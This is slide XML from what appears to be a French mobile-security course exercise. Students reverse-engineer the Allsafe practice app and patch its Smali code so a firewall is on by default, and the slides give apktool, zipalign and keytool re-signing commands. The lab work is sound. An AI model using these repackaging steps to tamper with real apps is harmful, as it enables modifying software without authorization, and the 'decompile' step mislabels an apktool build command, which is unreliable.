          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511787" y="2997723"/>
            <a:ext cx="3898390" cy="2496607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Oval 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDAE268-EF76-9B24-8D4D-4BEEB44BD2F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526821" y="5331572"/>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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89BB7CA7-D315-CC9F-7906-7CE9DFCE5208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6501861" y="6215616"/>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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30032653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lgn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>hired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> a new Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>developer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> made a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>beginner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>mistake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> setting up the firewall. Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>decompiled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Smali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> code in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> the firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> active by default ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Android Runtime (ART) and Dalvik</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://source.android.com/devices/tech/dalvik</a:t>
            </a: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a:t>Exercice 9 : Reverse Engineering (Smali Patch)</a:t>
            </a:r>
          </a:p>
          <a:p>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3805734" y="5413338"/>
            <a:ext cx="1618585" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>APKTool</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505267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>NA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD93C33F-A6A5-487D-A84C-9403A567BFF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2887" t="34670" r="49992" b="34917"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095063" y="5922630"/>
            <a:ext cx="1089025" cy="527844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2871815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err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Decompile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the APK file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> b -use-aapt2 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allsafe-new.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Locate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>smali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400"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a:t>Exercice 9 : Reverse Engineering (Smali Patch) [Solution]</a:t>
            </a:r>
          </a:p>
          <a:p>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2AC0166-BDB4-4053-87A6-5BFDD15A8067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="7600"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="415707" y="3290135"/>
            <a:ext cx="8449046" cy="1870621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FD79D49-D400-4924-906F-8D9CC4CAE31F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421753" y="5563751"/>
            <a:ext cx="8503057" cy="1617954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="285750" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="355600" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="541338" indent="-185738" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="719138" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="896938" indent="-177800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>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fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Etape 3 : Re </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>zipalign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allsafe-new.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-new-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aligned.apk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="16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endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8715460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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> 4 : Re </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>patched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>changed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the application code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>resign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>installing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keytool</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genkeypair</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dname</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cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=John Doe, ou=Security, o=Mobile, c=FR" -alias </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pentest</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keystore</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keystore.jks</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storepass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> mobile -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>validity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 20000 -</a:t>
            </a:r>
